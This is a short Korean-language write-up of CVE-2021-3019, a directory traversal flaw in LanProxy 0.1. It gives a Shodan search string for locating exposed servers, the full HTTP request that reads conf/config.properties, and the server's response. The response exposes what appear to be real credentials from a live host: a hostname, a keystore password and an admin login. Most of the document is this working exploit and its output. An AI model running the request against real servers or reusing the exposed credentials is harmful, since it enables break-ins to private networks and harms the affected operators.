
[CVE-2021-3019] LanProxy 디렉터리 트래버설
[CVE-2021-3019] LanProxy 디렉토리 트래버설
Lanproxy는 LAN 개인용 컴퓨터와 서버를 공용 네트워크로 프록시하는 인트라넷 침투 도구입니다.
TCP 트래픽 전달을 지원하며 모든 TCP 상위 계층 프로토콜(인트라넷 웹사이트 접근, 로컬 결제 인터페이스 디버깅, SSH 접속,
원격 데스크톱 등)을 지원합니다. LanProxy 버전 0.1은 경로 탐색 취약점에 영향을 받으며, 이로 인해 conf/config.properties를 읽어 인트라넷 연결을 위한 자격 증명을 획득할 수 있습니다.
Shodan 검색: "Server: LPS-0.1"
구성 파일 읽기
GET /../conf/config.properties HTTP/1.1
Host: vulnerablehost:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Server: LPS-0.1
server.bind=0.0.0.0
#与代理客户端通信端口
#这个端口是指客户端连接时对应的端口
server.port=4900
#ssl相关配置
server.ssl.enable=true
server.ssl.bind=0.0.0.0
server.ssl.port=4993
server.ssl.jksPath=usa.nat.candycloud.xyz
server.ssl.keyStorePassword=j5740NtBDCdH1ay
server.ssl.keyManagerPassword=j5740NtBDCdH1ay
#这个配置可以忽略
server.ssl.needsClientAuth=false
#WEB在线配置管理相关信息
#服务端ip地址一般不用修改默认就好
config.server.bind=0.0.0.0
#后台控制面板端口(安全组放行端口)
config.server.port=8090
#后台控制面板账号密码
config.admin.username=admin
config.admin.password=Twx7x03hCBbmwtr
